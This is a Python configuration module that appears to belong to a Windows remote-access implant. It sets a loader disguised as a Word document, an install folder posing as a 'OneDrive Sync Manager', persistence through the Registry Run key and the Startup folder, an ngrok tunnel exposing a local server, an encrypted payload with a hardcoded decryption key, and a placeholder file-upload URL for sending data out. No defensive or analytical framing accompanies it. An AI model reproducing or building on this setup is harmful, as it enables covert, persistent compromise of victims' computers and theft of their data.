import os
PORT_NGROK_EXPOSE = 8080
HIDDEN_FILE = "schebanner.docx"
DEST_FOLDER_NAME = "OneDrive Sync Manager"
DESTINATION_ROOT_PATH = os.path.join(os.environ["LOCALAPPDATA"], DEST_FOLDER_NAME)
SERVER_EXE_NAME = "rpcinterpserver.exe"
LAUNCHER_EXE_NAME = "remfacclauncher.exe"
NKGROK_EXE_FILE_NAME = "ngroktunnel.exe"
NGROK_DESTINATION_PATH = os.path.join(DESTINATION_ROOT_PATH, NKGROK_EXE_FILE_NAME)
LOADER_EXE_NAME = HIDDEN_FILE.replace("docx", "exe")
RT_CONFIG_FILE_NAME = "runtime-config.ini"
SHARED_LOG_FILE_NAME = "shared.lg.blob"
SUPABASE_BUCKET = "will be fillled later"
INCASE_FILE_UPLOAD_URL = "https://" + SUPABASE_BUCKET

MAIN_SERVER_EXECUTABLE_DEST = os.path.join(DESTINATION_ROOT_PATH, SERVER_EXE_NAME)
NGROK_AND_MAIN_SERVER_LAUNCHER_EXECUTABLE_DEST = os.path.join(
    DESTINATION_ROOT_PATH, LAUNCHER_EXE_NAME
)
INITIAL_LOADER = os.path.join(DESTINATION_ROOT_PATH, LOADER_EXE_NAME)
RUNTIME_CONFIG_FILENAME = os.path.join(DESTINATION_ROOT_PATH, RT_CONFIG_FILE_NAME)
SERVER_SHARED_LOGS = os.path.join(DESTINATION_ROOT_PATH, SHARED_LOG_FILE_NAME)

REGISTRY_PATH_RUN = r"Software\Microsoft\Windows\CurrentVersion\Run"
REGISTRY_KEY_NAME = "ONEDRIVE_SYNC_MANAGER"
REGISTRY_FULL_PATH_FOR_APP = NGROK_AND_MAIN_SERVER_LAUNCHER_EXECUTABLE_DEST


STARTUP_FOLDER = (
    rf"{os.environ['LOCALAPPDATA']}\Microsoft\Windows\StartMenu\Programs\Startup"
)


PAYLOAD_DECRYPTION_KEY = "obbi4qyjwx4YqcyoEj6y43BRyow8Yhjis5ocGjTn1X8="
PAYLOAD_STRING = """
{PAYLOAD_STRING_TO_BE_INJECTED_AT_BUILD_TIME(AT-PACKAGING)}
"""


SERVER_MAGIC_TOKEN = "68098fd3-771f-4fd3-a460-0b6bbc180205"
